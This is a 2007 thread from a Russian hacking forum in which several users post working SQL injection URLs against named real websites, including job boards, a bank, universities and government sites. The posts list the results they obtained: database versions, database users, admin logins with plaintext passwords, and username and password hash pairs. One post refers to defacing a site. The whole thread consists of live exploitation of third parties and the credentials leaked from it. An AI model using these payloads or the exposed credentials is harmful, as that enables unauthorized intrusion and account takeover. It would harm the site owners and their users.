ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #3331  
Старый 17.10.2007, 21:48
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию

4job.ru

http://www.4job.ru/?pg_id=-1+union+select+concat(version(),0x2F,database(),0x 2F,user())

4.1.22/job4/job4@localhost



http://www.4job.ru/?pg_id=-1+union+select+concat(login,0x2F,password)+from+us ers+limit+1,1

логин/пароль
admin/999000

-------------------------------------------------------------------

http://www.professia.ru/res_search.php?ID=-2+union+select+concat(version(),0x2F,database(),0x 2F,user()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18/*

4.1.14-log/profess9_profess9/profess9_profess@localhost
 
Ответить с цитированием

  #3332  
Старый 17.10.2007, 23:21
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию

rabotka.ru

http://www.rabotka.ru/index.php?empty=1&idl=-3+union+select+concat(version(),0x2F,database(),0x 2F,user())

5.0.45/kikkas_job/kikkas@localhost


http://www.rabotka.ru/index.php?empty=1&idl=-3+union+select+concat(id,0x2F,name,0x2F,parol)+fro m+kikkas_job.webiusers+limit+0,1

ид\имя\пароль не хеш. в <title>

--------------------------------------------------------------

minerjob.ru

http://www.minerjob.ru/viewnew.php?id=-1+union+select+1,2,3,4,5,concat(version(),0x2F,dat abase(),0x2F,user())/*

5.0.32-Debian_7etch1-log/jobnet_mine/jobnet_mine@85.249.135.10


http://www.minerjob.ru/viewnew.php?id=-1+union+select+1,2,3,4,5,concat(first_name,0x2F,em ail,0x2F,pwd)+from+users+limit+1,1/*

имя\мейл\пароль не хеш.
 
Ответить с цитированием

  #3333  
Старый 18.10.2007, 03:57
*D1VER
Участник форума
Регистрация: 05.12.2006
Сообщений: 112
Провел на форуме:
685950

Репутация: 175
Отправить сообщение для *D1VER с помощью ICQ
По умолчанию

http://www.nhia.edu/news.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,aes_decrypt(aes_e ncrypt(concat(version(),0x33a,user()),1),1),22,33, 44,55,66,77,1,1,1,1,1,1,1,1+from+news/*

http://www.hvcc.edu/news_events/newsstory.php?id=-1+union+select+1,host,password,user,5,6,7,8,9,11,1 2,13,14,15+from+mysql.user+limit+0,1/*

http://gopanthers.fit.edu/sports_info/view.php?id=-1+union+select+1,2,current_time(),version()/*

Последний раз редактировалось *D1VER; 18.10.2007 в 04:17..
 
Ответить с цитированием

  #3334  
Старый 18.10.2007, 04:07
SWAT
Участник форума
Регистрация: 14.12.2006
Сообщений: 211
Провел на форуме:
1541753

Репутация: 552
По умолчанию

Код:
http://www.hostingdirectory.us/directory.php?ax=list&sub=1&cat_id=-1/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13/**
Код:
http://www.armagh.gov.uk/show_council_department.php?dis=whoswho&show_sub=7&department_id=-1+union+select+1,2,3,4,5,VERSION(),7,8,9,10/*

Последний раз редактировалось SWAT; 18.10.2007 в 04:16..
 
Ответить с цитированием

  #3335  
Старый 18.10.2007, 05:01
*D1VER
Участник форума
Регистрация: 05.12.2006
Сообщений: 112
Провел на форуме:
685950

Репутация: 175
Отправить сообщение для *D1VER с помощью ICQ
По умолчанию

http://www.eng.wayne.edu/page.php?id=-1+union+select+1,aes_decrypt(aes_encrypt(concat(ve rsion(),0x33a,user(),0x3a,0x3a,id,0x3a,accessid),1 ),1),3,4,5,7+from+users/*
 
Ответить с цитированием

  #3336  
Старый 18.10.2007, 11:14
b3
Постоянный
Регистрация: 05.12.2004
Сообщений: 647
Провел на форуме:
1698585

Репутация: 818


Отправить сообщение для b3 с помощью ICQ
По умолчанию

Цитата:
_http://www.storage.ru/_newstor/news.php?id=-22+union+select+admin,password,nick,4,5+from+users +limit+1,1
storage:*0F92CFEE8E9D2DAB2209AC88700985F6425EC4A1
Цитата:
_http://www.impact.org/news.php?id=-22+union+select+1,2,3,4,concat_ws(0x3a,login,passw ord),6,7,8+from+users+limit+1,1
carlo:47ffb440cc2afb7bba618a02bd25741e
carlo.barrettara@impact.org:47ffb440cc2afb7bba618a 02bd25741e
adam:f5489f1da0df19ee7ec09eb721501c3e
wilson:05199deca16614131327f2c3fea9031c
Цитата:
_http://www.basketball.com.np/news.php?id=-22+union+select+1,2,concat(username,0x3a,password) ,4,5+from+user
admin:e73833d10128caa0ecde2964b0323522 hash md5()
admin:dinesh1
"дефнул" http://www.basketball.com.np/news.php?id=26
скрин http://fu2reteam.org/bastetball.gif
 
Ответить с цитированием

  #3337  
Старый 18.10.2007, 12:49
fRg
Участник форума
Регистрация: 28.12.2006
Сообщений: 111
Провел на форуме:
500695

Репутация: 524
Отправить сообщение для fRg с помощью ICQ
По умолчанию

Код:
http://www.templatesfree.ru/templates.php?action=cards&id=-1+union+select+1,database()/*
http://www.templatesfree.ru/templates.php?action=cards&id=-1+union+select+1,user()/*
http://www.templatesfree.ru/templates.php?action=cards&id=-1+union+select+1,version()/*
 
Ответить с цитированием

  #3338  
Старый 18.10.2007, 17:25
Nea7
Участник форума
Регистрация: 08.09.2007
Сообщений: 211
Провел на форуме:
5076186

Репутация: 778
По умолчанию

Код:
http://www.tete.fi/regsystem/event.php?e_id=-1+union+select+1,2,concat(user(),0x3a,version(),0x3a,database()),4,5,6,7,8,9,10,11/*
tete.fi@62.73.59.250:4.0.27-standard-log:tetefi
Код:
http://www.cablemaster.ru/SHOP/shp_warlist.php?action=list&b_id=-1+union+select+aes_decrypt(aes_encrypt(version(),0x71),0x71)/*
4.1.18-log root:*F50E7C5E4FEF168E91C3573602248FD8CA82571A
Код:
http://www.ohot-prostory.ru/show_b.php?b_id=-1+union+select+1,2,3,4,aes_decrypt(aes_encrypt(version(),0x71),0x71),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/*&type=2
4.1.18-log
Код:
http://www.cjes.ru/actions/action.php?p_id=-1'/**/union/**/select/**/1,aes_decrypt(aes_encrypt(version(),0x71),0x71),3,4,5,6,7,8,9/*
4.1.18
Код:
http://afisha.newacropol.ru/showplace.php?p_id=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8,9,10,11,12/*
afisha@hosting1.atanor.ru:4.1.22-log:afisha
Код:
http://www.melan.gazinter.net/Forum/view.php?m_id=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6/*
melandb@localhost:4.1.22-log:melan
Код:
http://www.vesakday.net/vesak50/messages_details.php?m_id=-1+union+select+1,2,concat(user(),0x3a,version(),0x3a,database()),4,5,6,7,8,9/*&trnslang=th
vesak50@localhost:5.1.17-beta-log:vesak50
Код:
http://cen.iatp.org.ua/virtual/job/boardua/view.php?m_id=-1+union+select+1,2,concat(user(),0x3a,version(),0x3a,database()),4,5/*
cen@hosting.iatp.org.ua:4.1.22:cen
Код:
http://www.adm-km.gov.ua/forum/view.php?m_id=-1+union+select+1,2,concat(user(),0x3a,version(),0x3a,database()),4,5/*
admkmgovua@localhost:4.0.27:admkmgovua
 
Ответить с цитированием

  #3339  
Старый 18.10.2007, 18:59
0nep@t0p
Участник форума
Регистрация: 25.05.2007
Сообщений: 147
Провел на форуме:
2313429

Репутация: 728
По умолчанию

Банк "Объединенный Капитал"
Цитата:
http://www.okbank.ru/index.php?p=-42+union+select+1,2,3,4,5,6,7,8,9,10,11,user(),13, 14,15/*
Version: 4.1.20-lk-log
User: okbankru_site@localchost
 
Ответить с цитированием

  #3340  
Старый 18.10.2007, 19:11
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию

ankil.ru

http://www.ankil.ru/ibs/ibs_program_tpl.php?program_id=-1'+union+select+1,concat(username,0x2F,password),3 ,4,5,6,7,8,9,10,11,12,13+from+dokeos_main.user+lim it+0,1/*

логин\хеш

Еще есть таблица юзеров форума itaf_user в базе ita-forum, но запрос к ней выводит ошибку вероятно из-за тире в имени базы. Что с этим делать не знаю. Подскажите кто знает
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 25 (пользователей: 0 , гостей: 25)
 


Быстрый переход




ANTICHAT.XYZ